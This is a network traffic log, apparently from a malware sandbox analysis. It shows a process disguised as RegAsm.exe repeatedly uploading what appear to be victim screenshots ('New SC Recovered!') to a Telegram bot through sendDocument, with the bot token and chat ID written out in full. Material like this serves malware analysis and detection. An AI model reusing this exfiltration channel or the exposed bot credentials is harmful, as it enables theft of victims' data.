2024-10-03 07:19:26 UTC	15447	OUT	Data Raw: 4f 4c b4 d4 fc 39 24 37 d0 99 22 17 45 d4 6e 2b ce d0 33 c1 1e a6 bb 0a 2b cd 51 3d a8 50 e5 97 33 77 31 65 f0 a6 87 32 44 b2 58 ee 11 2e c4 fd eb f0 32 5b 1d 7d 58 d6 67 8a bf e4 2a 9f f5 c1 7f f4 26 ae b6 b9 2f 15 7f c8 55 3f eb 82 ff 00 e8 4d 5d 78 4f e3 47 fa e8 63 98 24 b0 d2 b7 97 e6 8c 6a 4a 28 af 70 f9 70 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 94 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 50 02 51 45 14 00 51 45 14 00 51 45 14 00 94 52 d2 50 01 45 14 50 31 28 a2 8a 00 28 a2 8a 06 14 94 51 40 05 14 51 40 c2 92 96 92 80 0a 28 a2 80 0a 4a 28 a0 02 8a 28 a0 62 51 45 14 c0 29 29 69 29 00 51 45 14 c6 14 51 48 68 00 a2 8a 28 18 51 45 14 00 52 51 45 00 14 51 9a 4a 06 14 51 45 00 14 51 45 00 25 14 51 Data Ascii: OL9$7"En+3+Q=P3w1e2DX.2[}Xg*&/U?M]xOGc$jJ(pp((((J(QEQEQ@QL(aEPQEQEQERPEP1((Q@Q@(J((bQE))i)QEQHh(QERQEQJQEQE%Q
2024-10-03 07:19:26 UTC	5496	OUT	Data Raw: 3f af 7f 77 f1 0f ec ef ef 7e 1f f0 4e ee 8a e1 28 a5 f5 df ee fe 21 fd 9f fd ef c3 fe 09 dd d2 57 0b 45 1f 5d fe ef e2 1f d9 ff 00 de fc 3f e0 9d d5 25 70 d4 51 f5 df ee fe 23 fe cf fe f7 e1 ff 00 04 ee 68 ae 16 8a 7f 5e fe ef e2 1f d9 ff 00 de fc 3f e0 9d cd 15 c3 51 47 d7 bf bb f8 ff 00 c0 0f ec ff 00 ef 7e 1f f0 4e e6 92 b8 7a 29 7d 7b fb bf 8f fc 00 fa 87 f7 bf 0f f8 27 71 49 5c 45 14 fe bd fd df c7 fe 00 fe a1 fd ef c3 fe 09 db d1 5c 45 14 7d 7b fb bf 88 7d 43 fb df 87 fc 13 b7 a4 ae 26 8a 3e bd fd df c4 3e a1 fd ef c3 fe 09 da d1 5c 55 14 7d 7b fb bf 88 fe a1 fd ef c3 fe 09 da d2 57 17 45 1f 5e fe ef e2 1f 50 fe f7 e1 ff 00 04 ed 28 ae 2e 8a 3e bb fd df c7 fe 00 7d 47 fb df 87 fc 13 b3 a2 b8 ca 28 fa f7 f7 7f 1f f8 03 fa 8f f7 bf 0f f8 27 65 45 71 Data Ascii: ?w~N(!WE]?%pQ#h^?QG~Nz)}{'qI\E\E}{}C&>>\U}{WE^P(.>}G('eEq
2024-10-03 07:19:26 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 32 61 38 30 37 63 31 34 37 34 37 2d 2d 0d 0a Data Ascii: -----------------------------8dd02a807c14747--
2024-10-03 07:19:26 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:19:26 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49719	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:19:30 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd06261abaf81b Host: api.telegram.org Content-Length: 66189 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:19:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:19:31 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 36 32 36 31 61 62 61 66 38 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 36 32 36 31 61 62 61 66 38 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 31 36 2f 32 30 32 34 20 30 39 3a 35 34 3a 34 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd06261abaf81bContent-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd06261abaf81bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 11/16/2024 09:54:40User
2024-10-03 07:19:31 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:19:31 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:19:31 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:19:31 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:19:31 UTC	603	OUT	Data Raw: 5c 4b 7a d1 de 5f 5a af ef 31 b5 4a 0e ab 8c e4 92 32 32 73 9c e2 b9 ad 7e 09 6d b5 eb e8 66 9f cf 95 66 6d f2 ed db bc e7 93 81 d2 a1 b7 d4 b5 0b 59 a4 9a da fa e6 19 65 e6 47 8e 56 56 7e 73 c9 07 9a ac ee f2 3b 3b b1 67 63 96 66 39 24 fa 9a 2c 02 57 53 e1 b9 2e 2d b4 b8 a5 b1 2e b3 cb a9 45 0c 9b 3a b2 6d 38 53 ea 09 ce 47 7c 57 2d 53 da de dd d9 ef fb 2d d4 d0 79 8b b5 fc a9 0a ee 1e 87 1d 45 0c 0e a2 46 79 6c 35 ad 3a de e2 59 12 2c b4 56 b2 2e 22 8e 31 2e 43 46 46 72 c7 20 72 17 86 3c 9a 4b 1b a7 b2 f1 66 93 a6 40 c8 52 d5 d2 07 25 15 be 76 60 64 23 23 83 9e 32 39 c0 ae 7a 2d 5b 52 8a 38 62 4b e9 fc 98 58 3c 71 33 96 8d 48 39 07 69 e3 af b5 56 59 e6 4b 81 70 92 ba cc 1b 78 90 31 0c 1b d7 3e b4 58 77 3b 2d 15 9d 20 d2 a0 8c b0 b5 bb 92 e8 5e 28 fb ae Data Ascii: \Kz_Z1J22s~mffmYeGVV~s;;gcf9$,WS.-.E:m8SG\|W-S-yEFyl5:Y,V."1.CFFr r<Kf@R%v`d##29z-[R8bKX<q3H9iVYKpx1>Xw;- ^(
2024-10-03 07:19:31 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 36 32 36 31 61 62 61 66 38 31 62 2d 2d 0d 0a Data Ascii: -----------------------------8dd06261abaf81b--
2024-10-03 07:19:31 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:19:31 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49720	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:19:37 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd09fe14711de6 Host: api.telegram.org Content-Length: 66189 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:19:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:19:37 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 66 65 31 34 37 31 31 64 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 66 65 31 34 37 31 31 64 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 31 2f 32 30 32 34 20 30 37 3a 31 38 3a 32 31 0a 55 73 65 72 Data Ascii: -----------------------------8dd09fe14711de6Content-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd09fe14711de6Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/21/2024 07:18:21User
2024-10-03 07:19:37 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:19:37 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:19:37 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:19:37 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:19:37 UTC	603	OUT	Data Raw: 5c 4b 7a d1 de 5f 5a af ef 31 b5 4a 0e ab 8c e4 92 32 32 73 9c e2 b9 ad 7e 09 6d b5 eb e8 66 9f cf 95 66 6d f2 ed db bc e7 93 81 d2 a1 b7 d4 b5 0b 59 a4 9a da fa e6 19 65 e6 47 8e 56 56 7e 73 c9 07 9a ac ee f2 3b 3b b1 67 63 96 66 39 24 fa 9a 2c 02 57 53 e1 b9 2e 2d b4 b8 a5 b1 2e b3 cb a9 45 0c 9b 3a b2 6d 38 53 ea 09 ce 47 7c 57 2d 53 da de dd d9 ef fb 2d d4 d0 79 8b b5 fc a9 0a ee 1e 87 1d 45 0c 0e a2 46 79 6c 35 ad 3a de e2 59 12 2c b4 56 b2 2e 22 8e 31 2e 43 46 46 72 c7 20 72 17 86 3c 9a 4b 1b a7 b2 f1 66 93 a6 40 c8 52 d5 d2 07 25 15 be 76 60 64 23 23 83 9e 32 39 c0 ae 7a 2d 5b 52 8a 38 62 4b e9 fc 98 58 3c 71 33 96 8d 48 39 07 69 e3 af b5 56 59 e6 4b 81 70 92 ba cc 1b 78 90 31 0c 1b d7 3e b4 58 77 3b 2d 15 9d 20 d2 a0 8c b0 b5 bb 92 e8 5e 28 fb ae Data Ascii: \Kz_Z1J22s~mffmYeGVV~s;;gcf9$,WS.-.E:m8SG\|W-S-yEFyl5:Y,V."1.CFFr r<Kf@R%v`d##29z-[R8bKX<q3H9iVYKpx1>Xw;- ^(
2024-10-03 07:19:37 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 66 65 31 34 37 31 31 64 65 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd09fe14711de6--
2024-10-03 07:19:37 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:19:37 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49721	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:19:39 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd0c4dd95d112b Host: api.telegram.org Content-Length: 66189 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:19:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:19:39 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 34 64 64 39 35 64 31 31 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 34 64 64 39 35 64 31 31 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 34 2f 32 30 32 34 20 30 36 3a 30 34 3a 32 31 0a 55 73 65 72 Data Ascii: -----------------------------8dd0c4dd95d112bContent-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd0c4dd95d112bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 11/24/2024 06:04:21User
2024-10-03 07:19:39 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:19:39 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
